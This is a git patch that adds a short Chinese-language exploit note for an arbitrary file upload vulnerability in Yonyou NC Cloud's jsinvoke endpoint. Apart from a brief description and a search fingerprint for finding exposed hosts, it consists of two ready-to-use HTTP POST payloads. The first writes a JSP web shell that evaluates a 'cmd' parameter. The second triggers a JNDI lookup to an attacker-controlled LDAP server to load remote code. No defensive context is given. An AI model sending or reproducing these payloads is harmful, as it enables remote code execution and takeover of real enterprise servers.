From 6cc2e7e604de9b8a5df111315647c15093b6e4e7 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 19 Aug 2023 20:39:39 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8B=20NC=20Cloud=20jsin?= =?UTF-8?q?voke=20=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
用友 NC Cloud jsinvoke 任意文件上传漏洞.md | 42 ++++++++++++++++++++++
1 file changed, 42 insertions(+)
create mode 100644 用友 NC Cloud jsinvoke 任意文件上传漏洞.md
diff --git a/用友 NC Cloud jsinvoke 任意文件上传漏洞.md b/用友 NC Cloud jsinvoke 任意文件上传漏洞.md
new file mode 100644
index 0000000..e6c4d24
--- /dev/null
+++ b/用友 NC Cloud jsinvoke 任意文件上传漏洞.md
@@ -0,0 +1,42 @@
+## 用友 NC Cloud jsinvoke 任意文件上传漏洞
+漏洞描述
+用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限
+app="用友-NC-Cloud"
+
+```
+POST /uapjs/jsinvoke/?action=invoke
+Content-Type: application/json
+
+{
+ "serviceName": "nc.itf.iufo.IBaseSPService",
+ "methodName": "saveXStreamConfig",
+ "parameterTypes": [
+ "java.lang.Object",
+ "java.lang.String"
+ ],
+ "parameters": [
+ "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",
+ "webapps/nc_web/407.jsp"
+ ]
+}
+
+POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
+Host:
+Connection: Keep-Alive
+Content-Length: 253
+Content-Type: application/x-www-form-urlencoded
+
+{
+ "serviceName": "nc.itf.iufo.IBaseSPService",
+ "methodName": "saveXStreamConfig",
+ "parameterTypes": [
+ "java.lang.Object",
+ "java.lang.String"
+ ],
+ "parameters": [
+ "${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}",
+ "webapps/nc_web/301.jsp"
+ ]
+}
+
+```